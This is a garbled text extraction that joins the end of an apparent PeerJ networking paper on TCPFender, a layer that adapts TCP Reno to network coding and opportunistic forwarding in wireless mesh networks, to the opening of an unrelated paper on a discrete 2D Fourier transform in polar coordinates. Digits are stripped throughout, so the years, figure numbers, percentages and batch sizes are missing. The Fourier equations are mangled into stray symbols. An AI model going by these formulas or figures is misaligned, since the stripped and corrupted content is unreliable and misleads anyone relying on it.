throughput (sun et al., ). one is a feedback based scheme to reduce the waiting delay. the other is an optimized progressive decoding algorithm to reduce computation delay. it can be applied to loss-based congestion control, but it does not take advantage of opportunistic data forwarding. since tcp-fnc is based on traditional ip forwarding, it is easily affected by link quality variation. combocoding (chen et al., ) uses both inter- and intra-flow networking to support tcp with deterministic zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure tcpfender design scheme. routing. the inter-flow coding is done between the data flows of the two directions of the same tcp session. the intra-flow coding is based on random linear coding serving as a forward-error correction mechanism. it has an adaptive redundancy to overcome variable packet loss rates over wireless links. however, combocoding was not designed for opportunistic data forwarding. contribution of tcpfender opportunistic data forwarding and network coding do not inherently support tcp, so many previous research on opportunistic data forwarding and network coding were not designed for tcp. other studies modified tcp protocols by cooperating network coding into tcp protocols; these work created different variants of tcp protocols to improve the throughput. however, tcp protocols (especially, tcp reno) are widely deployed in current communication systems, it is not easy work to modify all tcp protocols of the communication systems. therefore, we propose an adaptation layer (tcpfender) functioning below tcp reno. with the help of tcpfender, tcp reno do not make any change to itself and it can take advantage of both network coding and opportunistic data forwarding. design of tcpfender overview of tcpfender we introduce tcpfender as an adaptation layer above the network layer, which hides network coding and opportunistic forwarding from the transport layer. the process of tcpfender is shown in fig. . it confines the modification of the system only under the network layer. the goal of tcpfender is to improve tcp throughput in wireless mesh networks by opportunistic data forwarding and network coding. however, opportunistic data forwarding in wireless networks causes many dropped packets and out-of-order arrivals, and it is difficult for tcp sender to maintain a large congestion window. especially the underlying link layer is the stock ieee . , which only provides standard unreliable zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. broadcast or reliable unicast (best effort with a limited number of retransmissions). tcp has its own interpretation of the arrival (or absence) of the ack segments and their timing. it opens up its congestion window based on continuous acks coming in from the destination. the dilemma is that when packets arrive out of order or are dropped, the tcp receiver cannot signal the sender to proceed with the expected ack segment. unfortunately, opportunistic data forwarding can introduce many out-of-order arrivals, which can significantly reduce the congestion window size of regular tcp since it increases the possibility of duplicated acks. furthermore, the long decoding delay for batch-based network coding does not fare well with tcp, because it triggers excessive time-out events. the tcpfender adaptation layer at the receiving side functions over the network layer and provides positive feedback early on when innovative coded packets are received, i.e., suggesting that more information has come through the network despite not being decoded for the time being. this process helps the sender to open its congestion window and trigger fast recovery when the receiving side acknowledges the arrival of packets belonging to a later batch, in which case the sending side will resend dropped packets of the unfinished batch. on the sender side, the ack signalling module is able to differentiate duplicated acks and filter useless acks (shown in fig. ). tcpfender algorithm to better support tcp with opportunistic data forwarding and network coding, tcpfender inserts the tcp adaptation layer above the network work layer at the source, the forwarder, and the destination. the main work of the tcp adaptation layer is to interpret observations of the network layer phenomena in a way that is understandable by tcp. the network coding module in the adaptation layer is based on a batch-oriented network coding operation. the original tcp packets are grouped into batches, where all packets in the same batch carry encoding vectors on the same basis. at the intermediate nodes, packets will be recoded and forwarded following the schedule of opportunistic data forwarding proposed by more, which proposes a transmission credit system to describe the duplication of packets. this transmission credit system can compensate the packet loss, increase the reliability of the transmission, and represent the schedule of opportunistic data forwarding. the network coding module in the destination node will try to decode received coded packets to original packets when it receives any coded packet. the ack signalling modules at the source and the destination are responsible for translation between tcp acks and tcpfender acks. network coding in tcpfender we implement batch-oriented network coding operations at the sender and receiver to support tcp transmissions. all data pushed down by the transport layer in sender are grouped into batches, and each batch has a fixed number β (β= in our implementation) of packets of equal length (with possible padding). when the source has accumulated packets in a batch, these packets are coded with random linear network coding, tagged with the encoding vectors, and transmitted to downstream nodes. the downstream nodes are any nodes in the network closer to the destination. any downstream node can recode and zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. forward packets when it receives a sufficient number of them. we use transmission credit mechanism, as proposed in more, to balance the number of packets to be forwarded in intermediate nodes. we make two important changes to improve the network coding process of more for tcp transmissions. for a given batch, the source does not need to wait until the last packet of a batch from the tcp before transmitting coded packets. we call this accumulative coding. that is, if k packets (k <β) have been sent down by tcp at a point of time, a random linear combination of these k packets is created and transmitted. initially, the coded packets only include information for the first few tcp data segments of the batch, but will include more towards the end of the batch. the reason for this ‘‘early release’’ behaviour is for the tcp receiving side to be able to provide early feedback for the sender to open up the congestion window. on the other hand, we use a deeper pipelining than more where we allow multiple batches to flow in the network at the same time. to do that, the sending side does not need to wait for the batch acknowledgement before proceeding with the next batch. in this case, packets of a batch are labeled with a batch index for differentiation, in order for tcp to have a stable, large congestion window size rather than having to reset it to for each new batch. the cost of such pipelining is that all nodes need to maintain packets for multiple batches. source adaptation layer the source adaptation layer buffers all original packets of a batch that have not been acknowledged. the purpose is that when tcp pushes down a new data packet or previously sent data packet due to a loss event, the source adaptation layer can still mix it with other data packets of the same batch. the ack signalling module can discern duplicated acks which are not in fact caused by the network congestion. opportunistic data forwarding may cause many extra coded packets, specifically when some network links are of the high quality at a certain point. this causes the destination node to send multiple acks with same sequence number. in this case, such duplicated acks are not a signal for the network congestion, and should be treated differently by the ack signalling module in the source. these two cases of duplicated acks can actually be differentiated by tagging the acks with the associated sequence numbers of the tcp data segment. these acks are used by the tcpfender adaptation layer at the source and the destination and should be converted to original tcp acks before being delivered to the upper layer. the flow of data or acks transmissions is shown in the left of fig. . original tcp data segments are generated and delivered to the module of ‘‘network coding and opportunistic forwarding’’. here, tcp data segments may be distributed to several batches based on their tcp segment sequences, so the retransmitted packets will be always in the same batch as their initial distribution. after the current tcp data segment mixes with packets in a batch, tcpfender data segments will be generated and injected to network via hop-by-hop ip forwarding, which is essentially broadcasting of ip datagrams. on the ack signalling module, when it receives tcpfender acks, if the ack’s sequence number is greater than the maximum received ack sequence number, this ack will be translated into a tcp ack and delivered to the tcp sender. otherwise, the ack signalling module will check zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. whether this duplicated ack is caused by opportunistic data forwarding or not. then it will decide whether to forward a tcp ack to the tcp or not. the reason for differentiating duplicated acks at the source instead of at the destination is to reduce the impact of ack loss on tcp congestion control. destination adaptation layer the main function of the destination adaptation layer is to generate acks and detect congestion in the network. it expects packets in the order of increasing batch index. for example, when it is expecting the bth batch, it implies that it has successfully received packets of the previous b− batches and delivered them up to the tcp layer. in this case, it is only interested in and buffers packets of the bth batch or later. however, the destination node may receive packets of any batch. suppose that the destination node is expecting the bth batch, and that the rank of the decoding matrix of this batch is r. in this case, the destination node has ‘‘almost’’ received β×(b− )+r packets of the tcp flow, where β×(b− ) packets have been decoded and pushed up the tcp receiver, and r packets are still in the decoding matrix. when it receives a coded packet of the b′th batch, if b′<b, the packet is discarded. otherwise, this packet is inserted into the corresponding decoding matrix. such an insertion can increase r by if b′=b and this received packet is an innovative packet. the received packet is defined as an innovative packet only if the received packet is linearly independent with all the buffered coded packets within the same batch. in either case, it generates an ack of sequence number β×(b− )+r, which is sent over ip back to the source node. one exception is that if r =β (i.e. decoding matrix become full rank), the ack sequence number is β×(b̂− )+ r̂, where b̂ is the next batch that is not full and r̂ is its rank. at this point, the receiver moves on to the b̂th batch. this mechanism ensures that the receiver can send multiple duplicate acks for the sender to detect congestion and start fast recovery. it also supports multiple-batch transmissions in the network and guarantees the reliable transmission at the end of the transmission of each batch. the design of the destination adaptation layer is shown on the right of fig. . the network coding module has two functions. first, it will check whether the received tcpfender data segment is innovative or not. in either case, it will notify the ack signalling to generate a tcpfender ack. second, it will deliver original tcp data segments to tcp layer if one or more original tcp data segment are decoded after receiving an innovative coded data packet. this mechanism can significantly reduce the decoding delay of the batch-based network coding. on the other hand, tcpfender has its own congestion control mechanism, so tcp ack that is generated by the tcp layer will be dropped by the ack signalling module at the destination. forwarder adaptation layer the flow of data at forwarders is shown in the middle of fig. . the ack is unicast from the destination to the source by ip forwarding, which is standard forwarding mechanism and is not shown in the diagram. the intermediate node receives tcpfender data segment from below and this segment will be distributed into corresponding batches and regenerates a new coded tcpfender data segment. this new tcpfender data segment will be sent to zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure diamond topology. figure string topology. downstream forwarders via hop-by-hop ip broadcasting based on the credit transmission system proposed by more. performance evaluation in this section, we investigate the performance of tcpfender through computer simulations using ns- . the topologies of the simulations are made up of three exemplar network topologies and one specific mesh. these topologies are depicted in fig. ‘‘diamond topology,’’ fig. ‘‘string topology,’’ fig. ‘‘grid topology,’’ and fig. ‘‘mesh topology.’’ the packet delivery rates at the physical layer for the mesh topology are marked in fig. , and the packet delivery rates for other topologies are described in table . the source node and the destination node are at the opposite ends of the network. one ftp application sends long files from the source to the destination. the source node emits packets continuously until the end of the simulation, and each simulation lasts for s. all the wireless links have a bandwidth of mbps and the buffer size on the interfaces is set to packets. to compensate for the link loss, we used the hop-to-hop redundancy factor for tcpfender on a lossy link. recall that the redundancy factor is calculated based on the packet loss rate, which was proposed in more (chachulski et al., ). this packet loss rate should incorporate the loss effect at both the physical and link layers, which is higher than the marked physical layer loss rates. the redundancy factors of the links are thus set according to these revised rates. we compared our protocol against tcp and tcp + nc in four network topologies. in our simulations, tcp ran on top of ip, and tcp + nc has batch-based network coding enabled but still over ip. the version of tcp is tcp reno for tcpfender and both baselines. the ack packet for the three protocols are routed to the source by shortest-path routing. zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure grid topology. table packet delivery rate m m % % % % % % % % % % % % % % in this paper, we examined whether tcpfender can effectively utilize opportunistic forwarding and network coding. tcpfender can provide reliable transmissions in these four topologies and the analysis metrics we took are the network throughput and the end-to-end packet delay at the application layer. we repeated each scenario times with different random seeds for tcpfender, tcp + nc, and tcp/ip, respectively. in tcpfender, every intermediate node has the opportunity to forward coded packets and all nodes operate in the . broadcast mode. by contrast, for tcp/ip and tcp + nc, we use the unicast model of . with arq and the routing module is the shortest-path routing of etx couto et al. ( ). in the diamond topology (fig. ), the source node has three different paths to the destination. tcp and tcp + nc only use one path to the destination, but tcpfender could utilize more intermediate forwarders thanks to the opportunistic routing. the packet zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure mesh topology. figure throughput for diamond topology. delivery rates for each link are varied between %, %, % and %. we plotted the throughput of these three protocols in fig. . in all cases, the tcpfender has the highest throughput, and the performance gain is more visible for poor link qualities. next, we tested these protocols in the string topology (fig. ) with six nodes. the distance between the two nodes is m, and the transmission range is the default m. different combinations of packet delivery rates for -meter and -meter distances are described in table . as a result, the shortest path routing used by tcp and tcp+nc can decide to use the m or m links depending on their relative reliability. the throughputs of the three protocols are plotted in fig. , where we observed how they perform under different link qualities. except for the one case where both the m and m links are very stable (i.e., % and %, respectively), the gains of having network coding and opportunistic forwarding are fairly significant in maintaining tcp’s capacity to the application layer. zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure throughput for string topology. when the links are very stable, the cost of the opportunistic forwarding schedule and the network coding delay will slightly reduce the network throughput. we also plotted these three protocols’ throughputs in a grid topology (fig. ) and a mesh topology (fig. ). each node has more neighbours in these two topologies, compared to string topology (fig. ), which increases the chance of opportunistic data forwarding. the packet delivery rates are indicated in these two figures (figs. and ). in general, the packet delivery rates drop when the distance between a sender and a receiver increases. in our experiment, the source and destination nodes deploy at the opposite ends of the network. the throughput of tcpfender is depicted in fig. and it is much higher than tcp/ip because opportunistic data forwarding and network coding increase the utilization of network capacity. the gain is about % in our experiment. the end-to-end delays of the grid topology and the mesh topology are plotted in fig. . in general, tcp + nc has long end-to-end delays because packets need be decoded before delivered to the application layer, this is an inherent feature of batch-based network coding. tcpfender can benefit from backup paths and receive packets early, so it reduces the time-consumption of waiting for decoding and its end-to-end delay is shorter than tcp + nc. next, we are interested in the impact of batch sizes on the throughput and the end-to-end delay. figure shows the throughput of tcpfender in the mesh topology for batch sizes of , , , ..., packets. in general, batch sizes will have an impact on then tcp throughput (as exemplified in fig. ). when the batch size is small (≤ ), the increment of the batch size can increase the throughput, since it expands the congestion window. however, if the batch size is too large (> ), the increment of the batch size will decrease the zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure throughput and delay for grid topology and mesh topology. figure throughput and delay for different batch sizes. throughput because the increase of batch size will amplify the fluctuation of the congestion window and also increase packet overhead by long encoding vectors. the fig. also describes how many packets are transmitted in the network. each intermediate node will keep all unfinished batches. from the fig. , since the number of packets transmitted in the network is smaller than two batch sizes, intermediate nodes only need to keep two zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure evolution of congestion window for three different batch sizes simulated in the mesh topol- ogy. figure delay for two specific cases with batch sizes of and . batches of packets and the memories required to store the packets are acceptable. the nature of batch-based network coding will also introduce decoding delays, so the batch size has a direct impact on the end-to-end delay, as summaries in fig. . in fig. , we plotted the end-to-end delays of all packets over time in two sample simulations. note that these tests were done for files that need many batches to carry. on the other hand, when the file size is comparable to the batch size, the file-wise delay will be comparable to the decoding zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. delay of an entire batch, which may seem large relatively. however, because the file size is small, this delay is not overly significant as the delay is at the order of its transmission time. nevertheless, network coding does add considerable amount of delay in comparison to pure tcp/ip. concluding remarks in this paper, we proposed tcpfender, which is a novel mechanism to support tcp with network coding and opportunistic data forwarding. tcpfender completes the control feedback loop of tcp by creating a bridge between the adaptation modules of the sender and the receiver. the sender adaptation layer in tcpfender differentiates duplicate acks caused by network congestion from these caused by opportunistic data forwarding, and the receiver side releases ack segments whenever receiving an innovative packet. in current work, we implemented our algorithm to support tcp reno. in fact, tcpfender can also support other tcp protocols with loss-based congestion control (e.g., tcp-newreno, tcp-tahoe). the adaptive modules are designed generally enough to not only support network coding and opportunistic data forwarding, but also any packet forwarding techniques that can cause many dropping packets or out-of-order arrivals. one example will be multi-path routing, where ip packets of the same data flow can follow different paths from the source to the destination. by simulating how the tcp receiver will signal the tcp sender, we are able to adapt tcpfender to functioning over such the multi-path routing without having to modify tcp itself. in the simulation results, we compared tcpfender and tcp/ip in four different network topologies. the result shows that tcpfender has a sizeable throughput gain over tcp/ip, and the gain will be very distinct from each other when the link quality is not that good. we also discussed the influence of batch size on the network throughput and end-to-end packet delay. in general, the bath size has a small impact on the network throughput, but it has direct impact on end-to-end packet delay. in future, we will consider tcp protocols with rtt-based congestion control and also analyze how multiple tcp flows interact with each other in a network coded, opportunistic forwarding network layer, or a more generally error-prone network layer. we will refine the redundancy factor and the bandwidth estimation to optimize the congestion control feedback of tcp. finally, we will propose a theoretical model of tcp with opportunistic forwarding and network coding, which will enable us to study the tcpfender as a function in various communication systems. additional information and declarations funding this work was supported in part by the natural sciences and engineering research council (nserc) of canada (discovery grants - and - , and strategic project grant stpgp - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: natural sciences and engineering research council (nserc) of canada: - , - . strategic project grant stpgp: - . competing interests the authors declare there are no competing interests. author contributions • chen zhang, yuanzhu chen and cheng li conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/uploadforpeerj/ns- . . references aguayo d, bicket j, biswas s, judd g, morris r. . link-level measurements from an . b mesh network. in: proceedings of the conference on applications, technologies, architectures, and protocols for computer communications (sigcomm), vol. . new york: acm, – . ahlswede r, cai n, shuo-yen, li r, yeung rw. . network information flow. information theory ( ): – doi . / . . argyriou a. . wireless network coding with improved opportunistic listening. ieee transactions on wireless communications ( ): – doi . /twc. . . bao w, shah-mansouri v, wong vw, leung vc. . tcp von: joint congestion control and online network coding for wireless networks. in: global communications conference (globecom). piscataway: ieee, – . basagni s, conti m, giordano s, stojmenovic i. . xors in the air: practical wireless network coding. ieee/acm transactions on networking ( ): – doi . /tnet. . . biswas s, morris r. . exor: opportunistic multi-hop routing for wireless networks. in: proceedings of the acm sigcomm conference on applications, technologies, architectures, and protocols for computer communications (sigcomm). new york: acm, – . cai s, zhang s, wu g, dong y, znati t. . minimum cost opportunistic routing with intra-session network coding. in: ieee international conference on communications (icc). piscataway: ieee, - . zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/uploadforpeerj/ns- . http://dx.doi.org/ . / . http://dx.doi.org/ . /twc. . http://dx.doi.org/ . /tnet. . http://dx.doi.org/ . /peerj-cs. chachulski s, jennings m, katt s, katabi d. . trading structure for randomness in wireless opportunistic routing. acm sigcomm computer communication review ( ): – doi . / . . chen c-c, chen c, oh sy, park j-s, gerla m, sanadidi my. . combocoding: combined intra-/inter-flow network coding for tcp over disruptive manets. journal of advanced research : – doi . /j.jare. . . . chen y, zhang j, marsic i. . link-layer-and-above diversity in multi-hop wireless networks. ieee communications magazine ( ): – doi . /mcom. . . couto dsjd, aguayo d, bicket j, morris r. . a high-throughput path metric for multi-hop wireless routing. in: proceedings of the th annual international conference on mobile computing and networking (mobicom). new york: acm, – . garrido p, gómez d, agüero r, serrat j. . combination of random linear coding and cross-layer opportunistic routing: performance over bursty wireless channels. in: ieee th annual international symposium on personal, indoor, and mobile radio communications (pimrc). piscataway: ieee, – . ho t, médard m, koetter r, karger dr, effros m, shi j, leong b. . a random linear network coding approach to multicast. ieee transmission on information theory ( ): – doi . /tit. . . hsu y-p, abedini n, gautam n, sprintson a, shakkottai s. . opportunities for network coding: to wait or not to wait. ieee/acm transactions on networking ( ): – doi . /tnet. . . huang y, ghaderi m, towsley d, gong w. . tcp performance in coded wireless mesh networks. in: sensor, mesh and ad hoc communications and networks (secon). piscataway: ieee, – . jaggi s, sanders p, chou pa, effros m. . polynomial time algorithms for multicast network code construction. ieee transmission on information theory : – doi . /tit. . . jain s, das s. . exploiting path diversity in the link layer in wireless ad hoc networks. in: world of wireless mobile and multimedia networks (wowmom). piscataway: ieee, – . koetter r, médard m. . an algebraic approach to network coding. ieee transmis- sion on networking ( ): – doi . /tnet. . . koutsonikolas d, wang c-c, hu yc. . efficient network-coding-based opportunis- tic routing through cumulative coded acknowledgments. ieee/acm transactions on networking (ton) ( ): – doi . /tnet. . . krigslund j, hansen j, hundeboll m, lucani de, fitzek fhp. . core: cope with more in wireless meshed networks. in: vehicular technology conference (vtc spring), – . laneman jn, tse dnc, wornell gw. . cooperative diversity in wireless networks: efficient protocols and outage behavior. ieee transmission on information theory ( ): – doi . /tit. . . zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jare. . . http://dx.doi.org/ . /mcom. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tnet. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tnet. . http://dx.doi.org/ . /tnet. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /peerj-cs. larsson p. . selection diversity forwarding in a multihop packet radio network with fading channel and capture. acm sigmobile mobile computing and communica- tions review ( ): – doi . / . . li p, guo s, yu sh, vasilakos av. . codepipe: an opportunistic feeding and routing protocol for reliable multicast with pipelined network coding. in: infocom. piscataway: ieee, – . li s-yr, yeung rw, cai n. . linear network coding. ieee transmission on informa- tion theory ( ): – doi . /tit. . . lin y, li b, liang b. . codeor: opportunistic routing in wireless mesh networks with segmented network coding. in: ieee international conference on network protocols (icnp). piscataway: ieee, – . lin y, liang b, li b. . slideor: online opportunistic network coding in wireless mesh networks. in: infocom, proceedings ieee. piscataway: ieee, – . mehta t, narmawala z. . survey on multimedia transmission using network coding over wireless networks. in: nirma university international conference on engineering, – . sun j, zhang y, tang d, zhang s, zhao z, ci s. . tcp-fnc: a novel tcp with network coding for wireless networks. in: international conference on communications (icc). piscataway: ieee,. sundararajan jk, shah d, medard m, jakubczak s, mitzenmacher m, barros j. . network coding meets tcp: theory and implementation. proceedings of the ieee ( ): – doi . /jproc. . . wang z, chen y, li c. . corman: a novel cooperative opportunistic routing scheme in mobile ad hoc networks. ieee journal on selected areas in communica- tions ( ): – doi . /jsac. . . yan y, zhang b, mouftah ht, ma j. . practical coding-aware mechanism for opportunistic routing in wireless mesh networks. in: ieee international conference on communications. piscataway: ieee, – . zhu d, yang x, yu w, lu c, fu x. . incor: inter-flow network coding based opportunistic routing in wireless mesh networks. in: ieee international conference on communications (icc). piscataway: ieee, – . zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /peerj-cs. discrete two dimensional fourier transform in polar coordinates part ii: numerical computation and approximation of the continuous transform discrete two dimensional fourier transform in polar coordinates part ii: numerical computation and approximation of the continuous transform xueyang yao and natalie baddour department of systems design engineering, university of waterloo, waterloo, on, canada department of mechanical engineering, university of ottawa, ottawa, on, canada abstract the theory of the continuous two-dimensional ( d) fourier transform in polar coordinates has been recently developed but no discrete counterpart exists to date. in the first part of this two-paper series, we proposed and evaluated the theory of the d discrete fourier transform (dft) in polar coordinates. the theory of the actual manipulated quantities was shown, including the standard set of shift, modulation, multiplication, and convolution rules. in this second part of the series, we address the computational aspects of the d dft in polar coordinates. specifically, we demonstrate how the decomposition of the d dft as a dft, discrete hankel transform and inverse dft sequence can be exploited for coding. we also demonstrate how the proposed d dft can be used to approximate the continuous forward and inverse fourier transform in polar coordinates in the same manner that the d dft can be used to approximate its continuous counterpart. subjects algorithms and analysis of algorithms, scientific computing and simulation, theory and formal methods keywords fourier theory, dft in polar coordinates, polar coordinates, multidimensional dft, discrete hankel transform, discrete fourier transform, orthogonality introduction the fourier transform (ft) is a powerful analytical tool and has proved to be invaluable in many disciplines such as physics, mathematics and engineering. the development of the fast fourier transform (fft) algorithm (cooley & tukey, ), which computes the discrete fourier transform (dft) with a fast algorithm, firmly established the ft as a practical tool in diverse areas, most notably signal and image processing. in two dimensions, the fft can still be used to compute the dft in cartesian coordinates. however, in many applications such as photoacoustics (xu, feng & wang, ) and tomography (scott et al., ; fahimian et al., ; lee et al., ; lewitt & matej, ), it is often necessary to compute the ft in polar coordinates. moreover, for functions that are naturally described in polar coordinates, a discrete version of the d ft in polar coordinates is needed. there have been some attempts to calculate the ft in polar coordinates, most notably through the hankel transform, since the zeroth order how to cite this article yao x, baddour n. . discrete two dimensional fourier transform in polar coordinates part ii: numerical computation and approximation of the continuous transform. peerj comput. sci. :e doi . /peerj-cs. submitted july accepted january published march corresponding author natalie baddour, nbaddour@uottawa.ca academic editor yilun shang additional information and declarations can be found on page doi . /peerj-cs. copyright yao and baddour distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:nbaddour@�uottawa.�ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ hankel transform is known to be a d ft in polar coordinates for rotationally symmetric functions. however, prior work has focused on numerically approximating the continuous transform. this stands in contrast to the ft, where the dft can stand alone as an orthogonal transform, independent of the existence of its continuous counterpart. the idea of a polar ft has been previously investigated, where the spatial function is in cartesian coordinates but its ft is computed in polar coordinates (averbuch et al., ; abbas, sun & foroosh, ; fenn, kunis & potts, ). fts have been proposed for non-equispaced data, referred to as unequally spaced fft (usfft) or non-uniform fft (nufft) (dutt & rokhlin, ; fourmont, ; dutt & rokhlin, ; potts, steidl & tasche, ; fessler & sutton, ). a recent book gives a unified treatment of these topics (plonka et al., ). previous work has also considered the implications of using a polar grid (stark, ; stark & wengrovitz, ). although the above references demonstrate that the computation of a discrete d ft on a polar grid has previously been considered in the literature, there is to date no discrete d ft in polar coordinates that exists as a transform in its own right, with its own set of rules of the actual manipulated quantities. in part i of this two part series, we proposed an independent discrete d ft in polar coordinates, which has been defined to be discrete from first principles (baddour, ). for a discrete transform, the values of the transform are only given as entries in a vector or matrix and the transform manipulates a set of discrete values. to quote bracewell (bracewell, ), “we often think of this as though an underlying function of a continuous variable really exists and we are approximating it. from an operational viewpoint, however, it is irrelevant to talk about the existence of values other than those given and those computed (the input and output). therefore, it is desirable to have a mathematical theory of the actual quantities manipulated”. hence, in our previous paper (baddour, ), standard operational ‘rules’ of shift, modulation and convolution rules for this d dft in polar coordinates were demonstrated. the operational rules were demonstrated via the key properties of the proposed discrete kernel of the transform. however, using the discrete kernel may not be the most effective way to compute the transform. furthermore, while the d dft in polar coordinates was demonstrated to have properties and rules as a standalone transform independent of its relationship to any continuous transform, an obvious application of the proposed discrete transform is to approximate its continuous counterpart. hence, the goal of this second part of this two-part paper series is to propose computational approaches to the computation of the previously proposed d dft in polar coordinates and also to validate its effectiveness to approximate the continuous d ft in polar coordinates. the outline of the paper is as follows. “definition of the discrete d ft in polar coordinates” states the proposed definition of the discrete d ft in polar coordinates. the motivation of this definition and the transform rules (multiplication, convolution, yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shift etc.) are given in the first part of this two-part paper. the transform exists in its own right and manipulates discrete quantities that do not necessarily stem from sampling an underlying continuous quantity. nevertheless, the motivation for the definition of the transform is based on an implied underlying discretization scheme. “discrete transform to approximate the continuous transform” introduces the implied underlying discretization scheme where we show the connection between discrete samples of the continuous functions and the discrete transform, should it be desirable to interpret the transform in this manner. here, the connection between using the proposed d dft and sampled vales of the continuous functions is explained. the proposed d dft was motivated by a specific sampling scheme (discrete transform to approximate the continuous transform) which can be plotted and analyzed for “grid coverage”—how much of the d plane is covered and at which density. thus, “discretization points and sampling grid” analyzes the proposed discretization points and their implication on the sampling grid for density and coverage of the grid. the insights gained from this section will be useful in interpreting the results of approximating the continuous transform with the discrete transform. “numerical computation of the transform” introduces numerical computation schemes whereby the interpretation of the proposed d transform as a sequence of d dft, d discrete hankel transform (dht) and d inverse dft (idft) is exploited. “numerical evaluation of the d dft in polar coordinates to approximate the continuous ft” then investigates the ability of the proposed d dft to approximate the continuous transform in terms of precision and accuracy. three test functions for which closed-form continuous transforms are known are analyzed. finally, “summary and conclusion” summarizes and concludes the paper. definition of the discrete d ft in polar coordinates the d-dft in polar coordinates has been defined in the first part of this two-paper series as the discrete transform that takes the matrix (or double-subscripted series) fpk to the matrix (double-subscripted series) fql such that fpk ! fqm is given by fqm ¼ f fpk � � ¼ xn � k¼ xm p¼�m fpke � qm;pk ( ) where p; k; q; m; n, n , and n are integers such that �m � n � m, where m þ ¼ n � m; k; � n � and �m � p; q � m. unless otherwise stated, in the remainder of the paper it shall be assumed that p; k; q; m; n, n , and n are within these stated ranges. similarly, for the inverse transform we propose fpk ¼ f� fqm � � ¼ xn � m¼ xm q¼�m fqme þ qm;pk ( ) yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in eqs. ( ) and ( ), e�qm;pk are the kernels of the transformation. these can be chosen as the “non-symmetric” form given by e�qm;pk ¼ n xm n¼�m jn jnkjnm jnn � � j nn j nþ jnkð Þ i�ne �i pnpn e þi pnqn eþqm;pk ¼ n xm n¼�m jn jnmjnk jnn � � j nþ jnmð Þ iþne þi pnpn e �i pnqn ( ) here, jn zð Þ is the nth order bessel function of the first kind and jnk denotes the kth zero of the nth bessel function. the subscript (+ or −) indicated the sign on the i� and on the exponent containing the p variable; the q variable exponent then takes the opposite sign. from a matrix point of view, both fpk and fql are n � n � ð Þ sized matrices. the form of the kernel in eq. ( ) arises naturally from discretization of the continuous transform, but does not lead to the expected parseval relationship. a possible symmetric kernel is discussed in the first part of this two-part paper and parseval relationships are discussed further there (baddour, ). discrete transform to approximate the continuous transform in this section, relationships between discretely sampled values of the function and its continuous d ft are presented in the case of a space-limited or band-limited function. these relationships were derived in the first part of the paper and are repeated here to demonstrate how they form the basis for the using the discrete transform to approximate the continuous transform at specified sampling points. space-limited functions consider a function in the space domain f ðr; uÞ which is space limited to r ; r½ �. this implies that the function is zero outside of the circle bounded by r ; r½ �. an approximate relationship between sampled values of the continuous function and sampled values of its continuous forward d transform f r; cð Þ has been derived in the first part of the two-part paper as f jqm r ; pq n � � � pr xn � k¼ xm p¼�m f jpkr jpn ; pp n � � n xm n¼�m i�njn jnkjnm jnn � � j nn j nþ jnkð Þ e �i pnpn e þi pnqn ( ) similarly, an approximate relationship between sampled values of the continuous forward transform f r; cð Þ and sampled values of the continuous original function f ðr; uÞ was shown to be given by f jpkr jpn ; pp n � � � pr xn � m¼ xm q¼�m f jqm r ; pq n � � n xm n¼�m injn jnmjnk jnn � � j nþ jnmð Þ e þi pnpn e �i pnqn ( ) yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in eqs. ( ) and ( ), f(r, θ) is the original function in d space and fðr; cÞ is the d ft of the function in polar coordinates. to evaluate if the d dft as proposed in eqs. ( ) and ( ) can be used to approximate sampled values of f(r, θ) and fðr; cÞ, the process is as follows. for the forward transform, we start with the continuous f(r, θ), evaluate it at the sampling points and then assign this value to fpk via fpk ¼ f jpkr jpn ; pp n � � ( ) then, fqm is calculated from the d dft scaled by pr , eq. ( ), that is fqm ¼ pr f fpk � � ¼ pr xn � k¼ xm p¼�m fpke � qm;pk ( ) the factor of pr is necessary so that the evaluation in eq. ( ) matches the expression in eq. ( ). to evaluate if 